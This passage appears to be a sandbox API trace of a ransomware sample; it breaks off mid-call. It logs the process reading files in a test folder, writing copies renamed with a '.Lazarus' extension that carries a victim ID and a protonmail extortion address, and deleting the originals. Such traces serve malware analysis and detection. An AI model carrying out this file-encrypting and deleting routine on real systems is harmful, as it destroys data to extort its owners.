[0074.209] GetLastError () returned 0x0 [0074.209] SetLastError (dwErrCode=0x0) [0074.209] GetLastError () returned 0x0 [0074.209] SetLastError (dwErrCode=0x0) [0074.209] GetLastError () returned 0x0 [0074.209] SetLastError (dwErrCode=0x0) [0074.209] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0xc82, lpOverlapped=0x0) returned 1 [0074.209] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.210] GetLastError () returned 0x0 [0074.210] SetLastError (dwErrCode=0x0) [0074.210] GetLastError () returned 0x0 [0074.210] SetLastError (dwErrCode=0x0) [0074.210] GetLastError () returned 0x0 [0074.210] SetLastError (dwErrCode=0x0) [0074.210] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.210] GetLastError () returned 0x0 [0074.210] SetLastError (dwErrCode=0x0) [0074.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7d010 [0074.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0074.210] GetLastError () returned 0x0 [0074.210] SetLastError (dwErrCode=0x0) [0074.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0074.210] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0xc90, lpOverlapped=0x0) returned 1 [0074.352] GetLastError () returned 0x0 [0074.352] SetLastError (dwErrCode=0x0) [0074.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.354] GetLastError () returned 0x0 [0074.354] SetLastError (dwErrCode=0x0) [0074.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0074.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0074.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.355] CloseHandle (hObject=0x410) returned 1 [0074.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.365] CloseHandle (hObject=0x42c) returned 1 [0074.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.366] AreFileApisANSI () returned 1 [0074.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x463c8 [0074.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.366] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.371] GetFileType (hFile=0x42c) returned 0x1 [0074.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0074.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.374] GetLastError () returned 0xb7 [0074.374] SetLastError (dwErrCode=0xb7) [0074.374] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.375] CloseHandle (hObject=0x42c) returned 1 [0074.375] AreFileApisANSI () returned 1 [0074.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45fd8 [0074.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.375] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x1, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0074.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.378] AreFileApisANSI () returned 1 [0074.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 42 [0074.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.378] AreFileApisANSI () returned 1 [0074.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0074.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.378] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.378] GetFileType (hFile=0x42c) returned 0x1 [0074.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.378] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.379] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.379] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.379] CloseHandle (hObject=0x42c) returned 1 [0074.379] AreFileApisANSI () returned 1 [0074.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67a20 [0074.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.379] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.379] GetFileType (hFile=0x42c) returned 0x1 [0074.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0074.379] CloseHandle (hObject=0x42c) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.381] AreFileApisANSI () returned 1 [0074.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67900 [0074.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.381] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a)) returned 1 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.381] AreFileApisANSI () returned 1 [0074.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.381] GetLastError () returned 0x0 [0074.381] SetLastError (dwErrCode=0x0) [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0074.381] GetLastError () returned 0x0 [0074.381] SetLastError (dwErrCode=0x0) [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0074.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0074.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0074.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.382] AreFileApisANSI () returned 1 [0074.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0074.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x74a18 [0074.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x74a18, cchWideChar=104 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 104 [0074.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.382] GetFileType (hFile=0x42c) returned 0x1 [0074.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74a18 | out: hHeap=0x20000) returned 1 [0074.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0074.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.383] AreFileApisANSI () returned 1 [0074.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0074.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.383] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.383] GetFileType (hFile=0x410) returned 0x1 [0074.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.383] GetLastError () returned 0x0 [0074.383] SetLastError (dwErrCode=0x0) [0074.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.383] GetLastError () returned 0x0 [0074.383] SetLastError (dwErrCode=0x0) [0074.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 